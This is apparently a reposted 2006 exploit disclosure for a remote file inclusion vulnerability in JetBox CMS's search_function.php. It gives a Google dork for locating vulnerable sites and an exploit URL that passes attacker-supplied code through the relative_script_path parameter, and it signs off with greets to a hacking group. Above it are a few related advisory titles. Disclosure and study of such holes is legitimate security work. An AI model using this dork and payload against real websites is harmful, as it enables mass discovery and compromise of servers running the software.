Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

[SA21635] HLstats "q" Cross-Site Scripting Vulnerability

[SA21667] PmWiki Table Markups Script Insertion Vulnerability

[SA21645] MyBB Avatar / Attachment Script Insertion Vulnerability

DUpoll 3.1 security bug

From:	CarcaBotx_(at)_yahoo.com <CarcaBotx_(at)_yahoo.com>
Date:	29.08.2006
Subject:	JetBox cms (search_function.php) Remote File Include

############################################
Found by : CarcaBot
--
E-mail : CarcaBotx [at] Yahoo [dot] com
--
$relative_script_path.'/libs/htmlheader.php
--
Exploit
--
# Google Dork: powered by Jetbox CMS
--
http://www.sitename.com/path/includes/phpdig/libs/search_function.php?relative
_script_path=[Evil Code]
--
Greets goes to : CarcaBot Administrator of Romanian Electronic Network Security Lab Team http://Hacking.CarcaBot.ro - Best Romanian Hacking Source